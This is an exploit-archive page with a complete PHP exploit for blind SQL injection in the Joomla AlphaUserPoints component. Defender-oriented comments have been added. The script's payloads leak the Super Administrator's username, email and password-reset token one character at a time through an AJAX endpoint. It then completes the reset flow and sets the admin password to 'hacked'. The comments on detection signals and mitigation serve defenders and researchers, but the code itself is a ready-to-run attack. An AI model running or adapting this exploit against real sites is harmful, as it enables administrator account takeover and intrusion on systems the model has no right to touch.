Joomla AlphaUserPoints SQL Injection

Joomla AlphaUserPoints SQL Injection
Posted Sep 15, 2009
Authored by jdc

Joomla AlphaUserPoints component remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | b10471a1cb7a7e563acfe04ced9fee0d1fd7b074d451465f55a4207293a247b5

Joomla AlphaUserPoints SQL Injection

<?php
// Joomla AlphaUserPoints -- boolean-based blind SQL injection proof of concept (jdc, 2009).
//
// How the script works, read from a defender's side:
//   1. It POSTs a `username2points` value to
//      components/com_alphauserpoints/assets/ajax/checkusername.php. The value closes the
//      quoted string and appends a UNION SELECT against `#__users` (the `#__` prefix is
//      Joomla's table-prefix placeholder, so the query is presumably run through Joomla's
//      DB API, which expands it). testData() treats an "OK" in the reply as "a row came back",
//      which turns the endpoint into a yes/no oracle.
//   2. Using ASCII(SUBSTRING(CONCAT(username,0x3a,email),$i,1)) = $j it recovers the
//      username:email of the first gid=25 account (the Super Administrator group in Joomla
//      1.5 of that era) one character at a time, one request per (position, candidate byte).
//   3. It then drives Joomla's com_user reset flow: fetches the reset form to obtain the
//      32-hex CSRF token, submits requestreset with the leaked e-mail, leaks the stored
//      `activation` value through the same oracle, submits it as the reset token, and sets
//      the password to "hacked".
//
// Detection signals visible in this code: many POSTs to checkusername.php whose
//   `username2points` contains a quote, UNION SELECT, ASCII(, SUBSTRING( and a trailing
//   "-- '"; the fixed User-Agent set in getData(); and a com_user requestreset ->
//   reset&layout=complete sequence for an administrator account shortly afterwards.
// Mitigation: update or remove the affected component (the injection implies the parameter
//   reaches the query without parameterisation or the DB escaping API), restrict the AJAX
//   endpoint, and alert on password resets of administrator accounts.
//
// Note on this PoC itself: `$_GET['url']` is interpolated into request URLs and echoed into
// HTML (see the last line) without validation or escaping, so the page that hosts it is
// itself exposed to reflected injection via the `url` parameter.
echo '<h2>Joomla Component AlphaUserPoints SQL Injection Exploit</h2>';
echo '<h4>jdc 2009</h4>';
echo '<fieldset><legend>Buffer</legend><div id="update" style="padding:8px;"></div></fieldset>';
echo '<script type="text/javascript">var update = document.getElementById("update");</script>';
// Long-running: one HTTP request per candidate byte, so the time limit is disabled.
ini_set( "memory_limit", "128M" );
ini_set( "max_execution_time", 0 );
set_time_limit( 0 );
if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
// Target endpoint; always plain http, built from the unvalidated `url` parameter.
$vulnerableFile = "http://".$_GET['url']."/components/com_alphauserpoints/assets/ajax/checkusername.php";
$url = $vulnerableFile;
// $url and $data are package-level state read by getData() via `global`.
$data = array();
$admin = '';
// Probe: does the oracle answer "OK" for a query that only returns a row through the UNION?
$data['username2points'] = "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '";
$output = getData();
echo 'Cheching for exploit...';
// magic_quotes_gpc would escape the closing quote and break the injection; that is the
// author's explanation for a failed probe (other causes -- patched component, WAF -- look the same).
if( !testData( $output ) ) die( 'Failed. Target may have magic quotes on.' );
echo 'done!<br />';
// ?check=1 stops after the probe and dumps the raw response for inspection.
if( isset( $_GET['check'] ) ) die( $output );
echo 'Getting admin username & email (this may take some time)...';
// Outer loop: character position. Stops when a full pass over the candidate bytes adds nothing
// (end of string, or oracle stopped answering).
for( $i=1;$i<250;$i++ )
{
$len = strlen( $admin );
$continue = FALSE;
// Inner loop: printable ASCII candidates 32..125 (126 '~' is never tried).
for( $j=32; $j<126; $j++ )
{
// Once the byte is found the remaining candidates are skipped, but the flush calls below still run.
if( $continue ) continue;
$data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,email),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
$output = getData();
if( testData( $output ) )
{
$admin .= chr( $j );
// Push the recovered character to the browser's "Buffer" div as progress output.
echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
$continue = TRUE;
}
ob_end_flush();
ob_flush();
flush();
}
if( $len == strlen( $admin ) ) break;
}
if( strlen( $admin ) == 0 ) die( 'failed!' );
echo '<script type="text/javascript">update.innerHTML = "";</script>';
echo "done!<br />";
echo "<h4>$admin</h4>";
// Recovered string is "username:email" (the 0x3a separator in the CONCAT above).
$admin = explode( ':', $admin );
echo "<br />Generating token...";
// GET the reset form; getData() sends no body when $data is empty.
$url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&tmpl=component";
$data = array();
// Pull the 32-hex-char name="..." attribute (Joomla's per-session form token) out of the HTML.
$token = preg_replace( array( '/\n/', '/(?:.*)name="([a-f0-9]{32})"(?:.*)/m' ), array( '', '$1' ), getData() );
if( strlen( $token ) != 32 ) die( 'failed!' );
echo 'done!<br />';
echo 'Resetting password...';
// Joomla checks the token as a POST field named by its value; hence `$token => 1`.
$url = "http://".$_GET['url']."/index.php?option=com_user&task=requestreset";
$data = array( 'email' => $admin[1], $token => 1 );
getData();
echo 'done!<br />';
echo 'Getting Reset Token...';
// Same oracle, now leaking the `activation` column (the reset token Joomla e-mailed to the
// admin) so the attacker never needs the mailbox. Candidate bytes 48..125 this time.
$url = $vulnerableFile;
$data = array();
$activation = '';
for( $i=1;$i<100;$i++ )
{
$len = strlen( $activation );
$continue = FALSE;
for( $j=48; $j<126; $j++ )
{
if( $continue ) continue;
$data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(activation),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
$output = getData();
if( testData( $output ) )
{
$activation .= chr( $j );
echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
$continue = TRUE;
}
ob_end_flush();
ob_flush();
flush();
}
if( $len == strlen( $activation ) ) break;
}
if( strlen( $activation ) == 0 ) die( 'failed!' );
echo 'done!<br />';
echo 'Sending Reset Token...';
// Completes the reset flow within the cookie session persisted by getData().
$url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
$data = array( 'token' => $activation, $token => 1 );
getData();
echo 'done!<br />';
echo 'Resetting Password to "hacked"...';
$url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
$data = array( 'password1' => 'hacked', 'password2' => 'hacked', $token => 1 );
getData();
echo 'done!<br />';
echo '<hr />';
echo 'You may now log in as admin using the following credentials:<br />';
echo '<strong>'.$admin[0].'</strong> / <strong>hacked</strong><br />';
// `url` is echoed into an href unescaped (see the note at the top of the file).
echo '<a href="http://'.$_GET['url'].'/administrator/">Start hacking!</a>';


// Output-buffer callback installed by getData()'s ob_start(). It always returns false, which
// under ob_start()'s contract hands the buffer back unchanged -- the actual capture is done
// by ob_get_contents()/ob_end_clean() in getData(), not here. The $buffer argument is unused.
function shutUp( $buffer ) { return false; }
// Oracle check: returns 1 when the endpoint's reply contains "OK" (its success answer),
// else 0. The pattern is unanchored and case-sensitive, so any response containing "OK"
// anywhere -- including an error page -- counts as a hit; a source of false positives.
function testData( $output ) { return preg_match( '/OK/', $output ); }
// Performs one HTTP request to the global $url and returns the response body as a string.
// Reads globals: $url (target), $data (assoc array; when non-empty the request becomes a
// POST with the url-encoded fields). Side effects: reads and writes the cookie file
// 'aup.cookie.txt' in the current working directory, so the Joomla session survives across
// calls (needed for the reset flow).
// The response is captured through PHP output buffering: curl_exec() is left to print the
// body (RETURNTRANSFER is 0) and ob_get_contents() collects it. Note that `CURL_TIMEOUT` and
// `CURL_RETURNTRANSFER` are not the usual CURLOPT_* constant names -- TODO confirm whether
// those two options take effect at all.
function getData()
{
global $data, $url;
ob_start( "shutUp" );
$ch = curl_init();
curl_setopt( $ch, CURL_TIMEOUT, 120 );
curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
curl_setopt( $ch, CURLOPT_URL, $url );
// Persist session cookies between requests.
curl_setopt( $ch, CURLOPT_COOKIEFILE, 'aup.cookie.txt' );
curl_setopt( $ch, CURLOPT_COOKIEJAR, 'aup.cookie.txt' );
if( count( $data ) > 0 )
{
curl_setopt( $ch, CURLOPT_POST, count( $data ) );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
}
// Fixed, dated User-Agent string -- a usable fingerprint for web-server log review.
curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
$result = curl_exec( $ch );
curl_close( $ch );
// $result is not used; the body printed by curl_exec() is taken from the output buffer.
$return = ob_get_contents();
ob_end_clean();
return $return;
}

/* jdc 2009 */



